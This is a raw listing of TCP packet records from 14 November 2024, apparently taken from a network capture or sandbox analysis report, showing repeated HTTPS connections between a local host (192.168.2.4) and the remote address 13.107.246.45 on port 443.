                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.417021990 CET49735443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.417083979 CET4434973513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.417150021 CET49735443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.417304039 CET49735443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.417334080 CET4434973513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.508111000 CET4434973113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.508285046 CET4434973113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.508361101 CET49731443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.508523941 CET49731443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.508523941 CET49731443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.508538008 CET4434973113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.508546114 CET4434973113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.510761976 CET49736443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.510860920 CET4434973613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.510992050 CET49736443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.511130095 CET49736443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.511156082 CET4434973613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.848016024 CET4434973213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.848447084 CET49732443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.848541021 CET4434973213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.848828077 CET49732443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.848846912 CET4434973213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.983040094 CET4434973213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.983211040 CET4434973213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.983285904 CET49732443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.983458996 CET49732443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.983504057 CET4434973213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.983534098 CET49732443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.983551025 CET4434973213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.986162901 CET49737443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.986196041 CET4434973713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.986258030 CET49737443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.986373901 CET49737443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:43.986382961 CET4434973713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.061156034 CET4434973313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.061691999 CET49733443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.061753988 CET4434973313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.062048912 CET49733443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.062064886 CET4434973313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.145318985 CET4434973413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.145663977 CET49734443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.145723104 CET4434973413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.146033049 CET49734443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.146048069 CET4434973413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.158305883 CET4434973513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.158618927 CET49735443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.158674002 CET4434973513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.158945084 CET49735443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.158958912 CET4434973513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.191847086 CET4434973313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.191891909 CET4434973313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.191962004 CET49733443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.192126989 CET49733443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.192173958 CET4434973313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.192246914 CET49733443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.192267895 CET4434973313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.194794893 CET49739443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.194822073 CET4434973913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.194892883 CET49739443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.195056915 CET49739443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.195064068 CET4434973913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.249377012 CET4434973613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.249861956 CET49736443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.249903917 CET4434973613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.250294924 CET49736443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.250308990 CET4434973613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.273262978 CET4434973413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.273330927 CET4434973413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.273379087 CET49734443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.273560047 CET49734443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.273577929 CET4434973413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.273590088 CET49734443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.273597002 CET4434973413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.276336908 CET49740443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.276403904 CET4434974013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.276487112 CET49740443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.276667118 CET49740443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.276695013 CET4434974013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.287669897 CET4434973513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.287705898 CET4434973513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.287766933 CET4434973513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.287766933 CET49735443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.287847042 CET49735443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.288067102 CET49735443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.288109064 CET4434973513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.288151979 CET49735443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.288167953 CET4434973513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.290994883 CET49741443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.291009903 CET4434974113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.291063070 CET49741443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.379395962 CET4434973613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.379565001 CET4434973613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.379636049 CET49736443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.379856110 CET49736443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.379890919 CET4434973613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.379921913 CET49736443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.379937887 CET4434973613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.382833004 CET49742443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.382879019 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.382936954 CET49742443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.383093119 CET49742443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.383111954 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.728244066 CET4434973713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.728864908 CET49737443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.728880882 CET4434973713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.729530096 CET49737443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.729535103 CET4434973713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.929444075 CET4434973913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.929831982 CET49739443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.929847002 CET4434973913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.930269003 CET49739443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.930278063 CET4434973913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.931979895 CET4434973713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.932269096 CET4434973713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.932315111 CET49737443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.932328939 CET4434973713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.932346106 CET4434973713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.932395935 CET49737443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.932543039 CET49737443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.932554960 CET4434973713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.935980082 CET49743443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.936018944 CET4434974313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.936086893 CET49743443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.936296940 CET49743443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:44.936316013 CET4434974313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.018796921 CET4434974013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.019345045 CET49740443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.019390106 CET4434974013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.019877911 CET49740443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.019891977 CET4434974013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.129081964 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.129671097 CET49742443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.129703045 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.130110025 CET49742443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.130121946 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.144201040 CET4434973913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.144279003 CET4434973913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.144315004 CET49739443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.144537926 CET49739443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.144551039 CET4434973913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.144561052 CET49739443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.144566059 CET4434973913.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.147368908 CET49744443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.147392988 CET4434974413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.147459030 CET49744443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.147680044 CET49744443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.147686958 CET4434974413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.151707888 CET4434974013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.151777983 CET4434974013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.151832104 CET49740443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.151962996 CET49740443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.151982069 CET4434974013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.152005911 CET49740443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.152019024 CET4434974013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.154551029 CET49745443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.154575109 CET4434974513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.154633045 CET49745443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.154776096 CET49745443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.154793978 CET4434974513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.259047031 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.259118080 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.259244919 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.259285927 CET49742443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.259365082 CET49742443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.259457111 CET49742443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.259458065 CET49742443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.259488106 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.259510994 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.262434959 CET49746443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.262485027 CET4434974613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.262717009 CET49746443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.262717009 CET49746443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.262749910 CET4434974613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.293994904 CET49741443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.294038057 CET4434974113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.294150114 CET49741443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.294323921 CET49741443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.294342041 CET4434974113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.717844009 CET4434974313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.718727112 CET49743443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.718727112 CET49743443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.718756914 CET4434974313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.718780041 CET4434974313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.852766037 CET4434974313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.852919102 CET4434974313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.853058100 CET49743443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.853058100 CET49743443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.853118896 CET4434974313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.853142977 CET49743443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.853149891 CET4434974313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.855681896 CET49747443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.855726004 CET4434974713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.855886936 CET49747443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.855988979 CET49747443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.855999947 CET4434974713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.876923084 CET4434974413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.877747059 CET49744443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.877747059 CET49744443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.877768040 CET4434974413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.877782106 CET4434974413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.936569929 CET4434974513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.937025070 CET49745443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.937060118 CET4434974513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.937499046 CET49745443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:45.937508106 CET4434974513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.014138937 CET4434974413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.014223099 CET4434974413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.014447927 CET49744443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.014532089 CET49744443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.014549017 CET4434974413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.014605045 CET49744443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.014611959 CET4434974413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.017165899 CET49748443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.017199993 CET4434974813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.017445087 CET49748443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.017446041 CET49748443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.017473936 CET4434974813.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.028145075 CET4434974613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.029154062 CET49746443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.029154062 CET49746443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.029191971 CET4434974613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.029212952 CET4434974613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.049133062 CET4434974113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.049649954 CET49741443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.049673080 CET4434974113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.050148964 CET49741443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.050156116 CET4434974113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.073816061 CET4434974513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.073879004 CET4434974513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.074120998 CET49745443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.074120998 CET49745443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.074157953 CET4434974513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.074165106 CET49745443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.074172020 CET4434974513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.076673031 CET49750443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.076689005 CET4434975013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.076863050 CET49750443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.076863050 CET49750443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.076886892 CET4434975013.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.161689043 CET4434974613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.161756039 CET4434974613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.161866903 CET4434974613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.161972046 CET49746443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.161972046 CET49746443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.162017107 CET4434974613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.162033081 CET49746443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.162039042 CET4434974613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.168180943 CET49751443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.168231010 CET4434975113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.168416977 CET49751443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.179483891 CET4434974113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.179630995 CET4434974113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.179693937 CET49741443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.179718018 CET49741443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.179718018 CET49741443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.179732084 CET4434974113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.179742098 CET4434974113.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.181531906 CET49752443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.181587934 CET4434975213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.181787968 CET49752443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.181787968 CET49752443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.181813955 CET4434975213.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.610080004 CET4434974713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.616553068 CET49747443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.616579056 CET4434974713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.617297888 CET49747443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.617311001 CET4434974713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.754791021 CET4434974713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.754945993 CET4434974713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.755364895 CET49747443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.755537987 CET49747443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.755567074 CET4434974713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.755593061 CET49747443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.755608082 CET4434974713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:46.759454966 CET49753443192.168.2.413.107.246.45
